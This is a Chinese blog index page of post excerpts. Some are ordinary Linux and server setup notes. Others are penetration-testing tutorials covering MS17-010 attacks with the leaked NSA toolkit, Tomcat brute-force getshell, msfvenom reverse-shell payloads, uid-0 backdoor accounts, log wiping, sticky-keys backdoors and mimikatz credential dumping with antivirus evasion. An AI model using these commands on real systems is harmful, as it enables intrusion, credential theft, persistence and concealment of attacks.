- 博客(34)
- 收藏
- 关注
RSS订阅原创 利用NSA的MS17-010漏洞利用工具攻击Windows7
0x01 Download NSA工具包NSA工具包下载攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境:python-2.6.6.msi、pywin32-221.win32-py2.6.exe0x02 修改NSA工具配置文件修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, .
2021-02-07 18:11:31
1740
原创 Tomcat 弱口令爆破登陆 War包上传 Getshell
影响版本Tomcat全版本环境搭建前两篇文章有提到,这里不再赘述尝试复现利用burpsuite进行爆破Manager登陆页http://10.130.3.245:8080/manager/html
2021-01-28 16:39:35
1224
原创 Ubuntu安装Tomcat
安装环境:Ubuntu16.04下载安装包这里我选择的是7.0.68的版本,因为后续需要复现漏洞https://archive.apache.org/dist/tomcat/解压tar zxvf apache-tomcat-7.0.68.tar.gz移动到/usr/local/cp -r apache-tomcat-7.0.68 /usr/local/mv apache-tomcat-7.0.68 tomcat启动cd /usrl/local/tomca
2021-01-28 14:32:28
2253
原创 Ubuntu安装JDK
安装环境:Ubuntu16.04下载安装包http://www.oracle.com/technetwork/cn/java/javase/downloads/jdk8-downloads-2133151-zhs.html解压tar zxvf jdk-8u281-linux-x64.tar.gz移动到/usr/lib/jdkmkdir /usr/lib/jdk mv ~/jdk1.8.0_281 /usr/lib/jdk配置环境变量sudo vim /etc/p...
2021-01-28 11:38:47
847
原创 Mac打开VMWare虚拟机出错:Could not open /dev/vmmon: 断裂管道.Please make sure that the kernel module `vmmon‘ is
问题描述:最近使用着好好的VMware突然出现了问题。启动机器就会提示:打不开 /dev/vmmon: 断裂管道 Please make sure that the kernel module `vmmon’ is loaded.解决方案:检查一下设置里边的安全性与隐私,看看有没有相关提示。经常会遇到这种错误提示,然后到设置里边的安全性与隐私一设置又可以了????打开设置里边的安全性与隐私就可以看到下面显示关于fusion是否被允许,选择允许然后提示需要重启...
2021-01-12 14:06:39
2168
3
原创 一篇由绕WAF得到的启示——长短IP的进制转换
0x01 前言最近看到一篇关于绕WAF的文章,里面有个点是这样子写的。作者把常规IP的表达形式写成了长IP的格式进行WAF绕过,当时看到是比较不懂的,经过研究之后,恍然大悟,借此机会记录一下。既然有长IP格式,那自然少不了短IP格式。首先先来看看短IP格式。0x02短IP格式通常我们需要访问本地搭建的Web服务时,都会以127.0.0.1去访问的。现在还可以直接以127.1直接访问到本地的Server,再比如访问6.6,那么访问的则是6.0.0.6,系统会自动补全。0x...
2020-08-05 17:39:47
1153
原创 Centos7 通过yum安装指定版本node
之前Linux上的nodejs是通过yum安装的,但是最近发现版本太老了,没法使用。解决方案:卸载老版本首先用yum卸载之前安装的nodejsyum remove nodejs npm -y之后再手动删除残留进入 /usr/local/lib 删除所有 node 和 node_modules文件夹 进入 /usr/local/include 删除所有 node 和 no...
2020-03-20 14:04:24
4851
原创 Centos7 yum安装MySQL5.7
配置 yum 源在https://dev.mysql.com/downloads/repo/yum/找到 yum 源 rpm 安装包安装MySQL源# 下载wget https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm# 安装 mysql 源yum localinstall mysql57-c...
2020-03-07 15:53:00
1213
原创 Centos7 更换源
查看源yum repolistyum repolist all更换源备份mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup下载源把新的源CentOS-Base.repo下载到到/etc/yum.repos.d/wget -O /etc/yum.repos.d/Cent...
2020-03-07 14:06:03
1338
原创 curl查询出口IP
[root@Centos ~]# curl ipinfo.io(代理IP){ "ip": "103.38.215.51", "city": "Makati City", "region": "Metro Manila", "country": "PH", "loc": "14.5503,121.0327", "org": "AS23930 IP-Converge Dat...
2020-03-07 14:00:24
1539
原创 如何为gradle设置全局代理
最近在折腾gradle编译的东西,遇到了一个头疼的事情,好在最后解决了,记录一下避免以后踩坑。编译环境的时候是通过socks5代理出去的export http_proxy=socks5://ip:portexport https_proxy=socks5://ip:portnetstat查看网络连接,发现连接到仓库下载依赖的IP是美国的,明明已经科*了,但是在编译过程中,却还是遇到...
2020-03-07 13:46:54
3465
1
原创 centos7 安装、升级node.js、更换源
1. 使用EPEL安装EPEL(Extra Packages for Enterprise Linux)企业版Linux的额外软件包,是Fedora小组维护的一个软件仓库项目,为RHEL/CentOS提供他们默认不提供的软件包先确认系统是否已经安装了epel-release包:yum info epel-release如果有输出有关epel-release的已安装信息,则说明已经...
2020-02-28 17:50:12
3347
原创 centos7 yum安装jdk
1、查看系统版本命令cat /etc/issue2、查看yum包含的jdk版本yum search java 或者 yum list java* 版本 jre jdk 1.8 java-1.8.0-openjdk.x86_64 java-1.8.0-openjdk-d...
2020-02-28 17:42:43
2450
原创 端口转发、映射、代理
端口转发&端口映射在实际渗透过程中,我们成功入侵了目标服务器。接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口、内网网站8080端口等等。传统的方法是利用nc、lcx等工具,进行端口转发。0x01 什么是端口转发端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任意主机的端口,转发到任意一台可以访问到的...
2020-02-20 16:02:53
8481
原创 ew穿透
EW是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。目前工具提供六种链路状态...
2020-02-20 15:32:47
2749
1
原创 一句话反弹shell
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshellWindowsmsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121...
2020-02-20 15:26:19
3009
原创 内网渗透之信息收集
信息获取总是第一步执行的操作,利用管理员的疏忽或者内网机器的弱口令来发现更多的信息。① 可以使用工具pwdump、mimikatz来抓取管理员hash,配合彩虹表或者在线hash破解,获得管理员的明文密码,这个可以作为自己的密码表,在进行内网其他机器的登陆时尝试。② 查看远程桌面的连接信息,一般通过远程桌面经常连接的机器会在该程序打开时候的下拉菜单中保存,如果管理员选择的是记住密码的话,那...
2020-02-20 14:57:53
2571
原创 Linux入侵痕迹清理
Linux入侵痕迹清理环境:Centos7、Kali虚拟机等清除登陆系统成功的记录[root@localhost root]# echo > /var/log/wtmp//此文件默认打开时乱码,可查到ip等信息[root@localhost root]#last//此时即查不到用户登录信息清除之前能看到之前其他机器的登录信息清除登陆系...
2020-02-20 14:38:31
6760
1
原创 Linux持续化后门
Linux权限维持环境:Centos7、Kali虚拟机等1、增加超级用户useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test通过命令创建了test 123456的超级用户2、unix bash远...
2020-02-20 10:51:15
3280
原创 Windows入侵痕迹清理
Windows入侵痕迹清理环境:Win10、Win7、Winxp虚拟机等Windows日志包括五个类别:应用程序、安全、Setup、系统、转发事件查看方式1、此电脑-右键管理-Windows日志2、powershell(管理员权限)查看所有日志:Get-winEvent查看应用程序类别下的日志:Get-WinEvent -FilterHashtabl...
2020-02-20 10:42:51
7559
原创 Windows持续化后门
Windows权限维持环境:Win10、Win7、Winxp虚拟机等0x01 shift后门windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有:C:\Windows\System32\sethc.exe粘滞键,启动快捷键:按五次shift键C:\Windows\System32\utilman.exe设置中心,启动快捷键:W...
2020-02-20 10:20:11
2120
原创 Windows远程执行命令
环境:Win10、Win7虚拟机Windows远程命令执行1、psexec.exe远程执行命令psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Admin...
2020-01-21 18:16:39
9948
原创 Windows10明文密码抓取
procdump+mimikatz获取win10用户明文密码测试环境:Win10 企业版LTSC 1809工具下载:k8版本的mz64.exe、procdumpv9.0原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进...
2020-01-21 17:26:38
8529
3
原创 几种姿势运行mimikatz
Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的神器,内网渗透中常用mimikatz获取明文密码或者获取hash值来漫游内网。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。姿势一:powershell...
2020-01-21 17:11:50
4782
原创 Centos7虚拟机克隆的网络问题(已解决)
遇到的问题打开克隆好的虚拟机,查看网卡信息发现没有IP,对了,我这里的虚拟机是双网卡解决方法1、进入/etc/udev/rules.d/这个目录,删除文件70-persistent-ipoib.rules[root@Centos ~]# cd /etc/udev/rules.d/[root@Centos rules.d]# rm -f 70-persistent-ipo...
2020-01-07 11:53:26
3137
原创 Centos7搭建部署ossec-server2.8.1
安装ossec-server端前提环境准备首先我们安装需要用到的关联库和软件,由于我们最终是需要把日志导入到MySQL中进行分析,以及需要通过web程序对报警结果进行展示,同时需要把本机当做SMTP,所以需要在本机安装MySQL、Apache和sendmail服务。在当前的终端中执行如下命令:yum install wget gcc make mysql mysql-server mys...
2020-01-06 19:23:25
3085
原创 ssh反向代理实现内网穿透
为了安全起见,公司或者是学校的服务器一般只允许用户在局域网内登录,离开内网环境后就没法登录服务器,特别不方便。但是在某些情况下,我们又想和服务器进行通信的话,就需要借助端口转发来达到目的。 ssh是一种安全的传输协议,通常我们会用在连接服务器上比较多。不过除了这个功能以外,ssh的隧道转发功能更吸引人。ssh常用命令参数 -C 请求压缩所有数据 -f 告诉s...
2019-12-23 12:24:09
3328
原创 Centos7搭建GLPI+fusioninventory资产管理系统
GLPI资产管理系统一、简介资产管理系统是用于帮助管理员管理和跟踪网络中计算机及网络设备的资产信息的软件。根据具体配置可以获取到资产的详细的软硬件信息及应用软件的安装下载情况。GLPI是法语Gestionnaire libre de parc informatique的缩写,是一款历史悠久的资产管理软件,他提供功能全面的IT资源管理接口,可以用来建立数据库来全面管理IT部门的电脑、显示...
2019-12-03 12:14:02
4441
原创 OSI网络七层协议
OSI(Open System Interconnect),即开放式系统互联参考模型,一般都叫OSI参考模型,是ISO(国际标准化组织)在1985年提出的一个试图将各种计算机或者通信系统在世界范围内互联为网络的标准框架模型。在这一框架下详细的规定了每一层的功能,以实现开放系统环境中的互连性、相互操作性和应用的可移植性。OSI七层协议模型主要有:应用层(Application)、表示层(Prese...
2019-09-08 17:28:48
2911
原创 HTTP协议知识点总结
最近看到一道与HTTP协议相关题目,感觉对计算机网络协议的知识点有点忘了,赶紧查阅资料对之前学习过的计算机网络知识做一个复习与总结。HTTP的概念协议是指计算机通信网络中两台计算机之间进行通信所必须共同遵守的规定或规则。HTTP协议,又称超文本传输协议(Hypertext transfer protocol),是一种详细规定了浏览器和万维网(WWW,World Wide Web)服务器之间互...
2019-08-24 18:39:14
1947
原创 CSRF的攻击与防御原理
CSRF(Cross Site Request Forgery)跨站域请求伪造,是一种网络的攻击方式,它在2007年曾被列为互联网20大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用,也就是人们所知道的钓鱼网站。CSRF介绍CSRF攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻...
2019-08-22 16:21:40
2127
原创 XSS的攻击原理与防御原理
xss又称跨站脚本攻击,原称为css(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以又称为xss(x一般有未知的含义,还有扩展的含义)。XSS的攻击原理xss攻击涉及到了攻击者,用户和web server。主要是利用了网站本身设计的不严谨性,攻击者通过对网页插入恶意的攻击脚本,导致当用户在浏览网页的时候,嵌入其中的攻击脚...
2019-08-22 00:37:45
3457
原创 定制Hexo-NexT的个性化博客
前几天,我写了一篇关于如何使用GitHub+Hexo搭建个人博客的博文,接下来我会以我的博客为例,讲讲如何对NexT主题的个性化定制和一些细节的优化。前言这篇博客主要是next主题的个性化定制,还有一些细节的优化。在搭建的过程,有一些优化,也是参考了大量之前大佬的教程和结合了一些做的比较优秀的博客,我在这里做了一个集合,同时把自己做的而别人没有做的优化,写出来方便大家。参考的文章我都会贴出...
2019-07-28 18:47:55
2390
原创 使用Github-Hexo搭建你的个人博客:搭建篇
前言早在初中,就想着自己搭起一个属于自己的网站,但是没有技术又不肯学习的我,怯于尝试,一直停滞不前。大学期间终于学习了,又因为自己的懒惰,觉得很难,不肯去尝试。直至今日,我想试一试,捣鼓了好一阵子,发现认真去做了,也没有想象中的难。其实早在放假之前,我就一直在捣鼓自己的博客了,使用的是Django。搞了好一阵子,就只剩一些细节的问题,准备上线的时候,Hexo出现在我的眼前,简约的风格一下子吸...
2019-07-26 14:50:52
2553
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人